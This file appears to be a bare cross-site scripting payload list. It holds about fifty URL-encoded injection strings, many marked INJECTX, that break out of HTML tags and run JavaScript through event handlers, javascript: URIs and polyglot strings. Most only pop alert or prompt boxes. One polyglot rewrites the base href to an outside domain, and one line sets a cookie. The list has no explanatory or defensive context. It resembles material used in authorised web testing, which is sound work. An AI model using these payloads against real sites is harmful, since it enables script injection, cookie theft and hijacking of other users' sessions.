%20onmouseover%3D"document.cookie%3Dtrue;">//INJECTX
'">><marquee><img%20src%3Dx%20onerror%3Dconfirm(1)></marquee>"></plaintext\></|\><plaintext/onmouseover%3Dprompt(1)><script>prompt(1)</script>@gmail.com<isindex%20formaction%3Djavascript:alert(/XSS/)%20type%3Dsubmit>'-->"></script><script>alert(1)</script>"><img/id%3D"confirm%26lpar;1)"/alt%3D"/"src%3D"/"onerror%3Deval(id%26%23x29;>'"><img%20src%3D"http://i.imgur.com/P8mL8.jpg">
/</title/'/</style/</script/</textarea/--><p"%20onclick%3Dalert()//>*/alert()/*
/</title/'/</style/</script/--><p"%20onclick%3Dalert()//>*/alert()/*
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
}alert(/INJECTX/);{//
<!--<img%20src%3D"--><img%20src%3Dx%20onerror%3Dalert(1)//">//INJECTX
<a%20href%3D"javascript:alert(1)"%20onmouseover%3Dalert(1)>INJECTX%20HOVER</a>
<audio%20onerror%3D"javascript:alert(1)"><source>//INJECTX
<button%20form%3Dtest%20onformchange%3Dalert(1)>//INJECTX
<form><button%20formaction%3D"javascript:alert(1)">//INJECTX
<h1/onclick%3Dalert(1)>a//INJECTX
<h1>INJECTX</h1>
<iframe/onload%3Dalert(/INJECTX/)>
<img%20onload%3Dalert(1)>//INJECTX
<img%20src%3Dx%20onerror%3Dprompt(1)>//INJECTX
<img%20src%3Dx%20onload%3Dprompt(1)%20onerror%3Dalert(1)%20onmouseover%3Dprompt(1)>
<img/src%3D'x'onerror%3Dalert(1)>//INJECTX
<input%20autofocus%20onfocus%3Dalert(1)>//INJECTX
<keygen%20autofocus%20onfocus%3Dalert(1)>//INJECTX
<marguee/onstart%3Dalert(1)>//INJECTX
<marquee%20loop%3D1%20width%3D0%20onfinish%3Dalert(1)>//INJECTX
<p/onclick%3Dalert(/INJECTX/)>a
<script>$%3D1,alert($)</script>//INJECTX
<script>alert(1)//INJECTX
<script>alert(1)<!--INJECTX
<select%20autofocus%20onfocus%3Dalert(1)>//INJECTX
<svg%20onload%3D(alert)(1)%20>//INJECTX
<svg/onload%3Dalert(/INJECTX/)>
<svg/onload%3Dalert(`INJECTX`)>
<svg/onload%3Dalert(1)>//INJECTX
<svg/onload%3Dalert`INJECTX`>
<svg><script>/<@/>alert(1)</script>//INJECTX
<textarea%20autofocus%20onfocus%3Dalert(1)>//INJECTX
<video%20onerror%3D"javascript:alert(1)"><source>//INJECTX
<video><source%20onerror%3D"javascript:alert(1)">//INJECTX
--></script></title></style>"/</textarea><a'%20onclick%3Dalert()//>*/alert()/*
“%20onclick%3Dalert(1)//<button%20‘%20onclick%3Dalert(1)//>%20*/%20alert(1)//
alert(1)>//INJECTX
jaVasCript:/*-/*`/*\`/*'/*"/**/(/*%20*/oNcliCk%3Dalert()%20)//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd%3Dalert()//>\x3e
JavaScript://%250Aalert%3F.(1)//'/*\'/*"/*\"/*`/*\`/*%26apos;)/*<!--></Title/</Style/</Script/</textArea/</iFrame/</noScript>\74k<K/contentEditable/autoFocus/OnFocus%3D/*${/*/;{/**/(alert)(1)}//><Base/Href%3D//X55.is\76-->
javascript://'//"%20--></textarea></style></script></title><b%20onclick%3D%20alert()//>*/alert()/*
javascript://'/</title></style></textarea></script>--><p"%20onclick%3Dalert()//>*/alert()/*
javascript://</title>"/</script></style></textarea/-->*/<alert()/*'%20onclick%3Dalert()//>/
javascript://</title></style></textarea>--></script><a"//'%20onclick%3Dalert()//>*/alert()/*
javascript://</title></textarea></style></script%20--><li%20'//"%20'*/alert()/*',%20onclick%3Dalert()//
javascript://--></script></title></style>"/</textarea>*/<alert()/*'%20onclick%3Dalert()//>a
javascript://--></title></style></textarea></script><svg%20"//'%20onclick%3Dalert()//
javascript:alert()//--></script></textarea></style></title><a"//'%20onclick%3Dalert()//>*/alert()/*
javascript:alert(1)//INJECTX
